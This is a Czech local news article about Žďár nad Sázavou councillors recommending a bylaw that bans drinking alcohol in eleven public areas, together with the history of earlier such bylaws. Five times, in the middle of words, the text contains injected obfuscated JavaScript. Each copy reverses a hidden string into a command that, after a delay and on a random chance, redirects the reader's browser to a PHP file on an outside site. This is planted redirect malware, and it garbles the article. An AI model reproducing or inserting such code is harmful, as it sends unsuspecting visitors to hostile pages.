Rainbow page separator

Ve Žďáře se vrátili k vyhlášce omezující alkohol na veřejnosti

Pondělí, 6. března 2023

Žďár nad Sázavou / Vyhlášku, kterou se zakazuje požívání alkoholických nápojů za účelem zabezpečení místních záleži$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tostí veřejného pořádku na veřejných prostranstvích, doporučili žďárští radní k vydání zastupitelům. Její součástí je i jedenáct mapově vymezených území. Zákaz by měl platit v době od 22 hodin večer do 6 hodin ráno v centru Žďáru a jeho okolí a taktéž kolem a v parku „u Ivana“, přičemž na dalších vyznačených veřejných prostranstvích pak stále. Jedná se o okolí Penny Marketu, HyperAlbertu a uby$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovny ve Strojírenské ulici, azylového domu v Dvořákově ulici a nákupního centra v Brněnské ulici, park před hřbi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovem v Novoměstské ulici, skatepark v ulici Sázavská, všechna dětská hřiště či pískoviště a okolí Kauflandu, au$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusového a vlakového nádraží v Chelčického ulici. Zákaz se nevztahuje na zahrádky restauračních podniků v jejich otevírací době. S výjimkou ze zákazu se počítá ve dnech 31. prosince a 1. ledna.  

Vyhláška omezující konzumaci alkoholu na veřejných prostranstvích v některých částech města byla ve Žďáře řešena opakovaně, poslední verze platná od roku 2016 byla zrušena loni na podzim – od té doby se může popíjet kdekoliv. Dříve pro konkrétní aktivity radní na základě žádostí schvalovali individuální výjimky, což později podle rozhodnutí ústavního soudu už nebylo možné, neboť ve vyhlášce musí být coby výjimka zakotvený konkrétní den, případně časové rozmezí. K zavedení zákazu konzumace alkoholu na veřejnosti v některých částech Žďáru prostřednictvím místní vyhlášky poprvé došlo už v roce 2012 a o čtyři roky později byl výčet „lihuprostých“ míst rozšířen. Původním záměrem v souvislosti se vznikem vyhlášky, která se později ukázala jako dvojsečná, bylo vymístění opilců s krabicemi levného vína budících veřejné pohoršení z frekven$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovaných míst. Prioritně šlo o náměstí, prostranství před obchodními domy či okolí nádraží.